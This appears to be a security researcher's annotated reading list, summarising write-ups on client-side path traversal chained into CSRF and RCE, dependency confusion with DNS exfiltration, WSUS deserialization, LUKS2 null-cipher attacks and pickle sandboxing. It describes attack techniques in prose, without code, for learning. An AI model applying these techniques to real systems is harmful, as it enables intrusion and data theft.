Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF- 1775

Maxence Schmitt - Doyensec    Reference →Posted 4 Months Ago
  • Client-side path traversal (CSPT) is a vulnerability where routing decisions can be controlled by a user-controlled value in the PATH parameter. For instance, the ID in the URL is set to ../../ID. On the frontend, this is then used on an API request. However, the ../../ID can change the routing of the request.
  • Cross-site request forgery (CSRF) is a classic vulnerability that has become harder and harder to do over time with A) knowledge of it and B) browser protections like same-site cookies. They wanted to combine these issues to allow for CSRF to still work in some cases.
  • CSPT will route a legitimate request. This can be used for CSRF-like attacks. Much of the time, there is no control over the HTTP method, headers, or body of the requests.
  • Sometimes, data is returned and then acted upon. When using a GET sink for CSPT, there is sometimes a response that contains the ID that is then used on future requests, such as state-changing POST requests. This allows for forcing the user to create arbitrary requests that shouldn't usually be possible. There's a key to this though: what data do we want to be returned from the GET request? The attacker must control the ID or routing value of the JSON. This can be achieved by exploiting file upload/download features to contain the content initially. Then, the state-changing action can occur.
  • They found an instance of this on the Mattermost chat application. An ID for telem_run_id in the URL was used in the routing that was vulnerable to CSPT. The only data being returned in the response that can be used is the action. This provides a minimal CSRF vuln with specific restrictions.
  • The whitepaper describes how important it is to know the limitations. Once you have this, you can explore more effective ways to exploit the issue. In this case, a single parameter is controlled in the POST request. However, arbitrary data can be put onto the path, including parameters. Knowing these restrictions, they noticed that the plugin installation process only required a single URL parameter. So, this led to RCE!
  • On Mattermost, they discovered a GET-to-POST-based sink. They uploaded a file to /api/v4/files to then use the returned data from the GET request in the POST request. Same as the previous issue, this led to RCE via URL parameters.
  • Overall, this is a good bug class to call out. It's somewhat new, which means many applications are likely to be vulnerable to it. It's a first-come-first-server game!

Abusing libmagic: Inconsistencies That Lead to Type Confusion- 1774

Hamid Sj    Reference →Posted 4 Months Ago
  • The author of this post had read Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal. Upon reading this post, they found that many of the tricks weren't working. They mainly relied on tricking a parser to think something was a different datatype than it really was. Because this, they decided to read the source code of libmagic and found how it decides if something is a JSON file or not.
  • If a JSON file has 500 levels of nesting, it treats it as plaintext. It turns out, that most languages for detecting file types have this limitation—the call range from 64 to thousands. In the case of libmagic, and many of its wrappers, anything over these amounts will simply return the type as plain-text. Little quirks can go a long ways!

Vibecoding my way to a crit on Github- 1773

Furbreeze    Reference →Posted 4 Months Ago
  • The author of this post had found a vulnerability in GitHub previously. They decided to conduct a scan for Dependency Confusion issues on GitLab and GitHub. While looking at package.json, they didn't find anything.
  • Their next step was to check Ruby dependencies on GitHub Enterprise, which is an open-source platform. They thought this was a good target because A) GitHub Enterprise isn't well-known to be open source, and B) dependency confusion in Ruby is less well-known. They noticed over 100 packages that were unregistered externally! So, they created a Ruby Gem for all of these that exfiltrated data via DNS to prove impact.
  • After waiting a bit, they had about 2K callbacks within a 24-hour window of submitting the vulnerability. This allowed them to execute code in several locations, including buildkitsandbox, vscode, and several others. After reporting the vulnerability, they were asked to take down the malicious gems to prevent further impact of the issue.
  • The author claims that they had access to the domain, which was used for the build process and dev code workspaces. They were awarded $20K but though it was going to be more. To give them credit, they stopped executing further payloads and didn't try to pivot at all. Based on this, they believe the payout should have been higher than the minimum payout for a critical. GitHub is known to have a good bug bounty program so it's hard to say who is right/wrong here.
  • A good write-up with sound guidance on the discovery process! I thoroughly enjoyed the blog post!

Claude Code Can Debug Low-level Cryptography- 1772

Filippo Valsorda    Reference →Posted 4 Months Ago
  • The author of this post was writing a Go implementation of ML-DSA, a post-quantum signature algorithm done by NIST last summer.
  • After 4 days of trying to create the implementation, the code was rejecting some valid signatures. They tried debugging it for several hours but were unable to resolve the issue. So, they asked Claude Code to check it out and left their computer for a bit.
  • The prompt explains what the code does and the issue they were dealing with. They granted it access to run the tests and implement the changes, as well as access to the source code for reading. They topped it off with ultrathink to make it go hard on the problem. To their surprise, an issue popped up! AI excels at well-scoped tasks like this one.
  • The issue was subtle in the math. They had merged HighBits and w1Encode into a single function for using it within Sign. This function was used in Verify(), which had already produced the high bits. So, they were effectively taking the high bits twice. Claude found the issue immediately without using any exploratory tool use!
  • Was this a fluke? They had two bugs prior to this that took an hour to debug. One was around incorrectly hardcoded constants. The other was an encoding being 32 bits instead of 32 bytes. In both cases, it was able to identify the issue through extensive debugging and multiple runs. Still, this was faster than the author of the post!
  • I love seeing use cases of AI and the prompts used. It helps me utilize the tooling better. Thanks for the article!

Introducing the First VS Code Extension for Solana Developers- 1771

Ackee    Reference →Posted 4 Months Ago
  • A Solana extension with real-time analysis of vulnerability classes. The extension performs checks on Anchor-specific issues, which are definitely needed! They have nine detectors. Of these, I find missing signer verification, unsafe math operations (overflows), and improper sysvar account checks to be the most interesting. Some of them aren't "security issues" like unused instruction attributes but it's good for static analysis checks.
  • There is also test coverage support. So, you can know which lines of code are not being hit by your unit tests/fuzzer. Good-looking extension!

Vulnerabilities in LUKS2 disk encryption for confidential VMs- 1770

Tjaden Hess - Trail of Bits    Reference →Posted 4 Months Ago
  • Confidential Virtual Machines (CVMs) are Linux-based systems that run in automated environments, handling secrets in an untrusted setting. They run on an untrusted host machine but are interacted with remotely. These are used in applications like private blockchains or multi-party data collaboration. These systems require that the host OS not be able to read memory or modify the the logical operation of the CVM. Additionally, a remote party should be able to confirm that they are running against a genuine CVM program via a remote attestation process.
  • LUKS2 encryption is used for encrypting the hard drive of the CVM. It contains header information, followed by the actual encrypted volume. The main encryption setting is aes-xts-plain64. The setting cipher_null-ecb is an algorithm that just ignores the key and returns the data unchanged. When the null cipher is used, the key slot can be opened with any passphrase. Effectively, the key phrase is just ignored - in newer versions, the password must be empty in this mode.
  • This attack enables you to substitute an attacker-controlled drive for the legitimate one.
  • The threat model is really confusing to me. It's a malicious host attacking a VM that is modifying the VM. If the device is running an OS in a VM, couldn't you change the VM's memory to perform arbitrary actions anyway? Maybe I'm misunderstanding something.

CVE-2025-59287 — WSUS Remote Code Execution- 1769

hawktrace    Reference →Posted 4 Months Ago
  • The Windows Server Update Service (WSUS) is a Microsoft tool that allows IT admins to manage updates for Windows systems.
  • The upgrade process contains a cookie that is encrypted using AES-128-CBC. It is passed BinaryFormatter.Deserialize() from the cookie once decrypted. This is a known sink that can be used to get RCE.
  • The API endpoint POST /ClientWebService/Client.asmx is the vulnerable endpoint. The cookie is encrypted but I don't understand how they are able to encrypt the data and then have that be decrypted and used for the deserialization attack. The PoC just has hardcoded data so maybe the key is hardcoded in the application. According to this article, this can be used to get RCE with SYSTEM privileges. Pretty dangerous bug!

Vibecoding and the illusion of security- 1768

Kevin Joensen - baldur    Reference →Posted 4 Months Ago
  • AI coding is used everywhere. A particular version of it "vibecoding" is letting the AI do the programming after a prompt only and seeing how it does. The author of this post asked the LLM to create a 2FA login application. Can it write secure code for a 2FA application? They tried both Sonnet 4.5 and Anthropic.
  • During the first attempt, it works! The wrong 2FA token will fail and the correct one succeeds. The UI actually looks very similar to a CTF challenge that I wrote recently even. It has a terrible flaw though: you can just brute force the OTP space, since it's only 6 digits without any brute force protections.
  • After discovering this feature issue, they asked the AI if there are any security features missing from the 2FA verify step. After doing this, it identifies the missing rate limiting. So, unless you tell the LLM to think about security, it won't magically do it for you. This is a really good lesson.
  • They asked the LLM to fix the issue. It had a rate limit of 5 invalid codes that would lock out after 15 minutes. It uses the library flask-limiter with 1.2K stars that is fairly maintained. It just adds the decorator to the function. After looking at the settings for Limiter, the application appears to limit by IP. Just by flipping the IP, the rate limit can be bypassed.
  • With this security issue, they decided to ask the LLM for "Is there anything faulty in the rate limitation that allows for a bypass?". Upon asking this, the LLM described the second vulnerability and fixed it. The fix had some weird cases for specific IPs but seemed okay. Upon taking a deeper look, the rate limiting was now based upon the IP and username. Again, the same issue still exists... After asking for more security issues, it gives you a bunch of non-existent ones.
  • Vibecoding will not lead to secure code. I think my job just got a lot harder. It's a great article about someone who actually tried to write a security sensitive application with LLMs to show it's terrible.

We May Have Finally Fixed Python’s 25-Year-Old Vulnerability- 1767

Yehuda Chikvashvili    Reference →Posted 4 Months Ago
  • Pickle, a serialization format in Python, is actually a small bytecode format that is a small interpreter. It can import modules and execute arbitrary code. Because of this, accepting pickle files as input is an automatic RCE vulnerability in your website. pickle.loads() is the sink to look for. Hugging Face had a vulnerability recently that could have been exploited this way.
  • It's crazy that a serialization format can execute arbitrary code. Imagine is JSON could do this... Pickle has been a bad security mistake for years. So, this post is about trying to fix the security of Pickle in Python!
  • Taint analysis is a strategy to use static code analysis tools to track the flow of untrusted data. In this case, they're trying to use taint analysis into a runtime domain for Python pickle deserialization. The key insight is that if there is a dangerous operation during deserialization, then we can block it. This requires two important things: a hook into dangerous calls and context awareness (are we in a deserialization or not).
  • PEP 578 is Python Audit Hooks. It's a great for auditing Python execution at runtime with custom hooks. Things like os.system can be hooked. This part is super easy once we know what's a well-defined "bad sink". PEP 567 has context variables for thread-local state. This can be placed as taint to specify whether the execution is within Pickle or not. This doesn't work in our case because the taint variable could be modified by the runtime itself. So, it was added at the CPython level, making it impossible to alter. Another alternative was to inspect the call stack. However, this has really bad performance penalties and has zero introspective of C code.
  • Using the audit hooks, it's possible to monitor for security sensitive operations. There is a set of strncmp() with various packages being checked. For instance, os., ctypes. and many others. This blacklist approach works well but broke a bunch of things. The initial version of this blacklist had easy evasion vectors via using global hooks. Many things still had issues, like multiprocessing. Finally, some calls were unaudited for some attributes and not others, making it incomplete. So, back to the drawing board!
  • Almost all sensitive operations appear during the import mechanism. By distinguishing between import related events and other operations, it would create a nice boundary. On the actual execution of bytecode, they were then able to use a whitelist of very specific audit events that have no impact. So, this solves the security problem! This has the limitation that it relies on an audit.
  • They do something unique at the end though: they have a Pickle sandbox with these protections and are asking researchers to escape! I really like this idea, as it gives people a chance to test the security of Pickle. Great article!

A questionable design choice in Stacks/Clarity- 1766

100 Proof    Reference →Posted 4 Months Ago
  • In Clarity, there is both tx.origin as tx-sender and msg.sender as contract-caller. Many contracts, including SIP-010 tokens, use tx-sender for authentication. This has the issue of phishing, where a user calls into a malicious contract, the contract can use the abuse the permissions to act as that user. The article dissects the implications of this design.
  • One interesting note to me was around requiring 1uSTX trick. Since the normal contract interactions are not expecting a function to be called, you can set the post-condition to be 0 STX. When this happens, the TX will fail. 1 STX is so little funds it's alright but it prevents the attack. Neat!